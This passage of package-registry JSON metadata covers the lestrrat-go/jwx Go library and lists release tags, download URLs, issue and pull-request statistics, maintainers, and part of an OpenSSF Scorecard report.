ttps://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.204Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/go-github-com-lestrrat-go-jwx-v2","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx-v2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/go-github-com-lestrrat-go-jwx-v2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/go-github-com-lestrrat-go-jwx-v2/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/go-github-com-lestrrat-go-jwx-v2/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":31689,"maintainers_count":0,"namespaces_count":0,"keywords_count":1627,"github":"guix-mirror","metadata":{"funded_packages_count":368},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-06-10T05:17:25.224Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":11403160,"name":"github.com/lestrrat-go/jwx/v2/internal/json","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-11-18T22:48:14.800Z","latest_release_number":null,"last_synced_at":"2026-06-11T18:31:52.803Z","created_at":"2025-03-04T15:37:23.192Z","updated_at":"2026-06-11T18:31:52.804Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/json","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/json","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/json#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: 